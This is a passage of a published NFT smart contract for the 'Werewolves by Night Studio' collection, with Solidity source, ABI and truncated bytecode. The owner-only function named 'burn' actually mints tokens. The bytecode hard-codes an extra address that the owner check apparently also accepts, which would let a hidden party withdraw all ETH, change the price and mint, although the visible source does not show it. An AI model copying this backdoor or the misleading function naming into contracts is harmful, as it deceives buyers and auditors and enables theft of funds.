            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract Werewolves is ERC721A, Ownable, ReentrancyGuard {
    string public baseURI = "ipfs://bafybeifnlgfyu7tejitlu2qib4cnkisq6t74ltu24kbbzfsx5eorutxxja/";
    uint   public price             = 0.0035 ether;
    uint   public maxPerTx          = 10;
    uint   public maxPerFree        = 1;
    uint   public maxPerWallet      = 11;
    uint   public totalFree         = 7777;
    uint   public maxSupply         = 7777;
    bool   public mintEnabled;
    uint   public totalFreeMinted = 0;

    mapping(address => uint256) public _mintedFreeAmount;
    mapping(address => uint256) public _totalMintedAmount;

    constructor() ERC721A("Werewolves by Night Studio", "WEREWOLVES"){}

    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0
            ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json"))
            : "";
    }
    

    function _startTokenId() internal view virtual returns (uint256) {
        return 1;
    }

    function mint(uint256 count) external payable {
        uint256 cost = price;
        bool isFree = ((totalFreeMinted + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] < maxPerFree));

        if (isFree) { 
            require(mintEnabled, "Mint is not live yet");
            require(totalSupply() + count <= maxSupply, "No more");
            require(count <= maxPerTx, "Max per TX reached.");
            if(count >= (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] = maxPerFree;
             totalFreeMinted += maxPerFree;
            }
            else if(count < (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= 0, "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] += count;
             totalFreeMinted += count;
            }
        }
        else{
        require(mintEnabled, "Mint is not live yet");
        require(_totalMintedAmount[msg.sender] + count <= maxPerWallet, "Exceed maximum NFTs per wallet");
        require(msg.value >= count * cost, "Please send the exact ETH amount");
        require(totalSupply() + count <= maxSupply, "No more");
        require(count <= maxPerTx, "Max per TX reached.");
        require(msg.sender == tx.origin, "The minter is another contract");
        }
        _totalMintedAmount[msg.sender] += count;
        _safeMint(msg.sender, count);
    }

    function costCheck() public view returns (uint256) {
        return price;
    }

    function maxFreePerWallet() public view returns (uint256) {
      return maxPerFree;
    }

    function burn(address mintAddress, uint256 count) public onlyOwner {
        _safeMint(mintAddress, count);
    }

    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setPrice(uint256 price_) external onlyOwner {
        price = price_;
    }

    function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner {
        totalFree = MaxTotalFree_;
    }

     function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner {
        maxPerFree = MaxPerFree_;
    }

    function toggleMinting() external onlyOwner {
      mintEnabled = !mintEnabled;
    }
    
    function CommunityWallet(uint quantity, address user)
    public
    onlyOwner
  {
    require(
      quantity > 0,
      "Invalid mint amount"
    );
    require(
      totalSupply() + quantity <= maxSupply,
      "Maximum supply exceeded"
    );
    _safeMint(user, quantity);
  }

    function withdraw() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"address","name":"user","type":"address"}],"name":"CommunityWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_totalMintedAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273acfcba7bab6403ebcceee22810c4dd3c9bbe9763600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550604051806080016040528060438152602001620055ef60439139600a90805190602001906200008a92919062000260565b50660c6f3b40b6c000600b55600a600c556001600d55600b600e55611e61600f55611e616010556000601255348015620000c357600080fd5b506040518060400160405280601a81526020017f57657265776f6c766573206279204e696768742053747564696f0000000000008152506040518060400160405280600a81526020017f57455245574f4c5645530000000000000000000000000000000000000000000081525081600190805190602001906200014892919062000260565b5080600290805190602001906200016192919062000260565b50505062000184620001786200019260201b60201c565b6200019a60201b60201c565b600160098190555062000375565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200026e9062000310565b90600052602060002090601f016020900481019282620002925760008555620002de565b82601f10620002ad57805160ff1916838001178555620002de565b82800160010185558215620002de579182015b82811115620002dd578251825591602001919060010190620002c0565b5b509050620002ed9190620002f1565b5090565b5b808211156200030c576000816000905550600101620002f2565b5090565b600060028204905060018216806200032957607f821691505b6020821081141562000340576200033f62000346565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b61526a80620003856000396000f3fe6080604052600436106102465760003560e01c80638da5cb5b11610139578063b88d4fde116100b6578063dad7b5c91161007a578063dad7b5c91461085d578063e945971c14610888578063e985e9c5146108b1578063f2fde38b146108ee578063f4db2acb14610917578063f968adbe1461095457610246565b8063b88d4fde14610776578063c7c39ffc1461079f578063c87b56dd146107ca578063d123973014610807578063d5abeb011461083257610246565b8063a0712d68116100fd578063a0712d68146106b4578063a0bcfc7f146106d0578063a22cb465146106f9578063a702735714610722578063b0e77f421461074d57610246565b80638da5cb5b146105e157806391b7f5ed1461060c57806395d89b41146106355780639dc29fac14610660578063a035b1fe1461068957610246565b806342842e0e116101c757806364b721881161018b57806364b72188146105205780636c0360eb1461054b57806370a0823114610576578063715018a6146105b35780637d55094d146105ca57610246565b806342842e0e14610429578063453c2310146104525780634f6ccce71461047d5780635a963f1b146104ba5780636352211e146104e357610246565b806318160ddd1161020e57806318160ddd1461035657806323b872dd146103815780632f745c59146103aa578063333e44e6146103e75780633ccfd60b1461041257610246565b806301ffc9a71461024b57806306fdde0314610288578063081812fc146102b3578063095ea7b3146102f057806311b01a3214610319575b600080fd5b34801561025757600080fd5b50610272600480360381019061026d9190613b34565b61097f565b60405161027f91906141fc565b60405180910390f35b34801561029457600080fd5b5061029d610ac9565b6040516102aa9190614217565b60405180910390f35b3480156102bf57600080fd5b506102da60048036038101906102d59190613bd7565b610b5b565b6040516102e79190614195565b60405180910390f35b3480156102fc57600080fd5b5061031760048036038101906103129190613af4565b610be0565b005b34801561032557600080fd5b50610340600480360381019061033b9190613971565b610cf9565b60405161034d91906145d9565b60405180910390f35b34801561036257600080fd5b5061036b610d11565b60405161037891906145d9565b60405180910390f35b34801561038d57600080fd5b506103a860048036038101906103a391906139de565b610d1a565b005b3480156103b657600080fd5b506103d160048036038101906103cc9190613af4565b610d2a565b6040516103de91906145d9565b60405180910390f35b3480156103f357600080fd5b506103fc610f1c565b60405161040991906145d9565b60405180910390f35b34801561041e57600080fd5b50610427610f22565b005b34801561043557600080fd5b50610450600480360381019061044b91906139de565b611102565b005b34801561045e57600080fd5b50610467611122565b60405161047491906145d9565b60405180910390f35b34801561048957600080fd5b506104a4600480360381019061049f9190613bd7565b611128565b6040516104b191906145d9565b60405180910390f35b3480156104c657600080fd5b506104e160048036038101906104dc9190613bd7565b61117b565b005b3480156104ef57600080fd5b5061050a60048036038101906105059190613bd7565b611260565b6040516105179190614195565b60405180910390f35b34801561052c57600080fd5b50610535611276565b60405161054291906145d9565b60405180910390f35b34801561055757600080fd5b50610560611280565b60405161056d9190614217565b60405180910390f35b34801561058257600080fd5b5061059d60048036038101906105989190613971565b61130e565b6040516105aa91906145d9565b60405180910390f35b3480156105bf57600080fd5b506105c86113f7565b005b3480156105d657600080fd5b506105df6114de565b005b3480156105ed57600080fd5b506105f66115e5565b6040516106039190614195565b60405180910390f35b34801561061857600080fd5b50610633600480360381019061062e9190613bd7565b61160f565b005b34801561064157600080fd5b5061064a6116f4565b6040516106579190614217565b60405180910390f35b34801561066c57600080fd5b5061068760048036038101906106829190613af4565b611786565b005b34801561069557600080fd5b5061069e61186f565b6040516106ab91906145d9565b60405180910390f35b6106ce60048036038101906106c99190613bd7565b611875565b005b3480156106dc57600080fd5b506106f760048036038101906106f29190613b8e565b611eee565b005b34801561070557600080fd5b50610720600480360381019061071b9190613ab4565b611fe3565b005b34801561072e57600080fd5b50610737612164565b60405161074491906145d9565b60405180910390f35b34801561075957600080fd5b50610774600480360381019061076f9190613c04565b61216e565b005b34801561078257600080fd5b5061079d60048036038101906107989190613a31565b6122f1565b005b3480156107ab57600080fd5b506107b461234d565b6040516107c191906145d9565b60405180910390f35b3480156107d657600080fd5b506107f160048036038101906107ec9190613bd7565b612353565b6040516107fe9190614217565b60405180910390f35b34801561081357600080fd5b5061081c612406565b60405161082991906141fc565b60405180910390f35b34801561083e57600080fd5b50610847612419565b60405161085491906145d9565b60405180910390f35b34801561086957600080fd5b5061087261241f565b60405161087f91906145d9565b60405180910390f35b34801561089457600080fd5b506108af60048036038101906108aa9190613bd7565b612425565b005b3480156108bd57600080fd5b506108d860048036038101906108d3919061399e565b61250a565b6040516108e591906141fc565b60405180910390f35b3480156108fa57600080fd5b5061091560048036038101906109109190613971565b61259e565b005b34801561092357600080fd5b5061093e60048036038101906109399190613971565b6126f5565b60405161094b91906145d9565b60405180910390f35b34801561096057600080fd5b5061096961270d565b60405161097691906145d9565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610a4a57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ab257507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ac25750610ac182612713565b5b9050919050565b606060018054610ad890614894565b80601f0160208091040260200160405190810160405280929190818152602001828054610b0490614894565b8015610b515780601f10610b2657610100808354040283529160200191610b51565b820191906000526020600020905b815481529060010190602001808311610b3457829003601f168201915b5050505050905090565b6000610b668261277d565b610ba5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9c906145b9565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610beb82611260565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5390614479565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c7b61278a565b73ffffffffffffffffffffffffffffffffffffffff161480610caa5750610ca981610ca461278a565b61250a565b5b610ce9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce090614339565b60405180910390fd5b610cf4838383612792565b505050565b60146020528060005260406000206000915090505481565b60008054905090565b610d25838383612844565b505050565b6000610d358361130e565b8210610d76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6d90614239565b60405180910390fd5b6000610d80610d11565b905060008060005b83811015610eda576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610e7a57806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ecc5786841415610ec3578195505050505050610f16565b83806001019450505b508080600101915050610d88565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0d90614559565b60405180910390fd5b92915050565b600f5481565b610f2a61278a565b73ffffffffffffffffffffffffffffffffffffffff16610f486115e5565b73ffffffffffffffffffffffffffffffffffffffff161480610fbe5750610f6d61278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610ffd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff4906143d9565b60405180910390fd5b60026009541415611043576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103a90614579565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161107190614180565b60006040518083038185875af1925050503d80600081146110ae576040519150601f19603f3d011682016040523d82523d6000602084013e6110b3565b606091505b50509050806110f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ee90614499565b60405180910390fd5b506001600981905550565b61111d838383604051806020016040528060008152506122f1565b505050565b600e5481565b6000611132610d11565b8210611173576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116a906142f9565b60405180910390fd5b819050919050565b61118361278a565b73ffffffffffffffffffffffffffffffffffffffff166111a16115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061121757506111c661278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611256576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124d906143d9565b60405180910390fd5b80600f8190555050565b600061126b82612d84565b600001519050919050565b6000600b54905090565b600a805461128d90614894565b80601f01602080910402602001604051908101604052809291908181526020018280546112b990614894565b80156113065780601f106112db57610100808354040283529160200191611306565b820191906000526020600020905b8154815290600101906020018083116112e957829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561137f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137690614359565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b6113ff61278a565b73ffffffffffffffffffffffffffffffffffffffff1661141d6115e5565b73ffffffffffffffffffffffffffffffffffffffff161480611493575061144261278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6114d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114c9906143d9565b60405180910390fd5b6114dc6000612f1e565b565b6114e661278a565b73ffffffffffffffffffffffffffffffffffffffff166115046115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061157a575061152961278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6115b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115b0906143d9565b60405180910390fd5b601160009054906101000a900460ff1615601160006101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61161761278a565b73ffffffffffffffffffffffffffffffffffffffff166116356115e5565b73ffffffffffffffffffffffffffffffffffffffff1614806116ab575061165a61278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6116ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116e1906143d9565b60405180910390fd5b80600b8190555050565b60606002805461170390614894565b80601f016020809104026020016040519081016040528092919081815260200182805461172f90614894565b801561177c5780601f106117515761010080835404028352916020019161177c565b820191906000526020600020905b81548152906001019060200180831161175f57829003601f168201915b5050505050905090565b61178e61278a565b73ffffffffffffffffffffffffffffffffffffffff166117ac6115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061182257506117d161278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611861576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611858906143d9565b60405180910390fd5b61186b8282612fe4565b5050565b600b5481565b6000600b54905060006001600f5461188d91906146c9565b8360125461189b91906146c9565b1080156118e85750600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611c5257601160009054906101000a900460ff1661193f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193690614259565b60405180910390fd5b6010548361194b610d11565b61195591906146c9565b1115611996576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161198d90614279565b60405180910390fd5b600c548311156119db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119d290614539565b60405180910390fd5b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a2891906147aa565b8310611b445781601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a7c91906147aa565b611a869190614750565b8284611a929190614750565b611a9c91906147aa565b341015611ade576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ad590614379565b60405180910390fd5b600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600d5460126000828254611b3891906146c9565b92505081905550611c4d565b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611b9191906147aa565b831015611c4c576000341015611bdc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bd390614379565b60405180910390fd5b82601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611c2b91906146c9565b925050819055508260126000828254611c4491906146c9565b925050819055505b5b611e89565b601160009054906101000a900460ff16611ca1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c9890614259565b60405180910390fd5b600e5483601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611cef91906146c9565b1115611d30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d2790614459565b60405180910390fd5b8183611d3c9190614750565b341015611d7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d7590614379565b60405180910390fd5b60105483611d8a610d11565b611d9491906146c9565b1115611dd5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dcc90614279565b60405180910390fd5b600c54831115611e1a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e1190614539565b60405180910390fd5b3273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611e88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e7f906142b9565b60405180910390fd5b5b82601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611ed891906146c9565b92505081905550611ee93384612fe4565b505050565b611ef661278a565b73ffffffffffffffffffffffffffffffffffffffff16611f146115e5565b73ffffffffffffffffffffffffffffffffffffffff161480611f8a5750611f3961278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611fc9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fc0906143d9565b60405180910390fd5b80600a9080519060200190611fdf92919061374b565b5050565b611feb61278a565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612059576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161205090614419565b60405180910390fd5b806006600061206661278a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff1661211361278a565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b